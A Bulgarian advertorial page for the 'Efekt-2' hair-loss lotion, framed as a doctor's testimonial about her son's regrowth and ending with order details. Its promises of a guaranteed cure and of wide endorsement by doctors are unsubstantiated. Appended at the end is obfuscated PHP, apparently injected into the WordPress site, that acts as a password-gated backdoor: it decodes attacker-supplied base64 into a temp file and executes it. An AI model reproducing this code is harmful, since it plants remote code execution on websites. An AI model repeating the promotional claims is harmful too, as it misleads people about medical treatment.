Косопад и оплешивяване? Гарантираното решение с "Ефект - 2"! | Косопад

Д-р Виолета Щъркова: Лосионът „Ефект-2” единствен върна косата на моя син!

Лосионът против косопад „Ефект-2” върна косата на сина ми!

косопад и оплешивяване

Д-р Щъркова: „Ефект-2“ единствен върна косата на сина ми!

Д-р Виолета Щъркова е един от 1284-е български лекари, които използват или горещо препоръчват на своите близки и пациенти, лосиона срещу косопад и оплешивяване „Ефект – 2”. Ето какво сподели д-р Щъркова (63 г. от Плевен), която е помогнала на хиляди по време на своята дълга практика:

За лосиона срещу косопад и оплешивяване „Ефект – 2” научих от моя син, който е на 33 г., живее и работи в Германия. Самият той разбрал за този уникален продукт от официалния сайт на лосиона против косопад в интернет и когато ми се обади беше много въодушевен. Аз самата бях по – скоро скептично настроена, защото до този момент нито един от подобните чуждестранни продукти, не бе успял да му помогне в борбата с оплешивяването. Никакви помади и мазила срещу косопад не дадоха резултат, въпреки че всички те бяха доста скъпи. Помоли ме да дам поръчка за четири шишенца и да му ги изпратя, защото „Ефект – 2” се произвежда само в България.

След почти два месеца, детето ми си дойде за няколко дни у дома и носеше със себе си шишенцата с лосиона срещу косопад „Ефект – 2”. Останах изумена, защото навсякъде по оплешивялото му теме бе избил гъст мъх. И всичко това само за петдесет дни терапия! Шест месеца по – късно той отново се прибра през лятната отпуска и резултатите бяха повече от смайващи! Отново успях да погаля неговата истинска тъмнокестенява коса, с която толкова обичах да си играя като беше дете! От оплешивяването нямаше ни най – малък спомен.

Това бе достатъчно, за да се убедя във вълшебната сила на лосиона срещу косопад „Ефект – 2” и оттогава да го препоръчвам на всички свои плешиви познати. Голяма част от тях го купуват и после ми се обаждат, за да се похвалят с новата си коса.

С уважение: Д-р Виолета Щъркова

С лосиона срещу оплешивяване и косопад „Ефект-2” можете да се снабдите чрез поръчка ТУК: Или на телефон: 0895 334 112

26. март 2013 19:19:06 от Косопад
Категории: Лекарите Препоръчват Ефект-2, Лосион срещу косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}